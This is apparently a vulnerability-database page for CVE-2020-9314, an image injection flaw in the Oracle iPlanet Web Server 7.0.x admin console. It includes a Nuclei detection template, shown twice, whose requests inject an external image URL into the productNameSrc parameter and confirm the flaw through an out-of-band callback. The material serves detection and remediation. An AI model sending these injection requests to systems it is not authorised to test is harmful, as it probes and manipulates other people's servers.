Oracle iPlanet Web Server 7.0.x - Image Injection

CVE-2020-9314

Verified

Description

Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.

Severity

Medium

CVSS Score

4.8

Exploit Probability

12%

Affected Product

iplanet_web_server

Published Date

January 23, 2026

Template Author

dhiyaneshdk

CVE-2020-9314.yaml

id: CVE-2020-9314

info:
  name: Oracle iPlanet Web Server 7.0.x - Image Injection
  author: DhiyaneshDk
  severity: medium
  description: |
    Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.
  impact: |
    Attackers can inject malicious images into the admin console, potentially leading to social engineering, phishing attacks, or interface manipulation.
  remediation: |
    Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.
  reference:
    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
    - http://seclists.org/fulldisclosure/2020/May/31
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2020-9314
    cwe-id: CWE-79
    epss-score: 0.12006
    epss-percentile: 0.93756
  metadata:
    verified: false
    max-request: 2
    vendor: oracle
    product: iplanet_web_server
    shodan-query: "Oracle-iPlanet-Web-Server"
    fofa-query: app="Oracle-iPlanet-Web-Server"
  tags: cve,cve2020,oracle,iplanet,injection,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"
      - "{{BaseURL}}/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "productNameSrc"
          - "Oracle iPlanet"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205f685d831fd5d1ae81379ce30ba44bc80566391ed8cc8122e81eed32ecf4094a022100e947edc97e4e8bfa517bf88220b1367d3e8a0d4ac1de9290edbd8fc5d92e8b68:922c64590222798bb761d5b6d8e72950

4.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2020-9314

CWE ID:

cwe-79

References

https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/http://seclists.org/fulldisclosure/2020/May/31 https://nvd.nist.gov/vuln/detail/CVE-2020-9314

Remediation Steps

Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.

id: CVE-2020-9314

info:
  name: Oracle iPlanet Web Server 7.0.x - Image Injection
  author: DhiyaneshDk
  severity: medium
  description: |
    Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.
  impact: |
    Attackers can inject malicious images into the admin console, potentially leading to social engineering, phishing attacks, or interface manipulation.
  remediation: |
    Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.
  reference:
    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
    - http://seclists.org/fulldisclosure/2020/May/31
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2020-9314
    cwe-id: CWE-79
    epss-score: 0.12006
    epss-percentile: 0.93756
  metadata:
    verified: false
    max-request: 2
    vendor: oracle
    product: iplanet_web_server
    shodan-query: "Oracle-iPlanet-Web-Server"
    fofa-query: app="Oracle-iPlanet-Web-Server"
  tags: cve,cve2020,oracle,iplanet,injection,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"
      - "{{BaseURL}}/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "productNameSrc"
          - "Oracle iPlanet"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205f685d831fd5d1ae81379ce30ba44bc80566391ed8cc8122e81eed32ecf4094a022100e947edc97e4e8bfa517bf88220b1367d3e8a0d4ac1de9290edbd8fc5d92e8b68:922c64590222798bb761d5b6d8e72950

Oracle iPlanet Web Server 7.0.x - Image Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Oracle iPlanet Web Server 7.0.x - Image Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps